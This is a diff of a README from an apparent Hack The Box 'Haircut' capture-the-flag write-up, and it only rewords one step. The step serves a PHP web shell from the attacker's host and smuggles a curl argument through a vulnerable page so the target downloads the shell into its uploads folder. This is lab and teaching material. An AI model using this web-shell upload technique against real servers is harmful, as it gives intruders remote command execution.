notsag-dev/htb-haircut/README.md

 drwxr-xr-x 2 www-data www-data 4.0K May 22  2017 uploads
 ```

-It seems `uploads` may be a good place where to put a web shell.
-I'm going to use a shell called `Predator.php` I got from here https://github.com/JohnTroony/php-webshells.git:
+It seems `uploads` may be a good place where to place a web shell.
+I'm going to use a shell called `Predator.php` I got from this repo https://github.com/JohnTroony/php-webshells.git:
 ```
 cd php-webshells
 python -m SimpleHTTPServer
 Serving HTTP on 0.0.0.0 port 8000 ...
 ```

-And now from the input in /exposed.php we get paste shell to uploads folder (now without wrapping it with the trick we used before to execute commands, as we'll leverage curl to get the shell):
+And now from the input in /exposed.php we curl it to uploads:
 ```
 10.10.14.23:8000/Predator.php -o uploads/Predator.php
 ```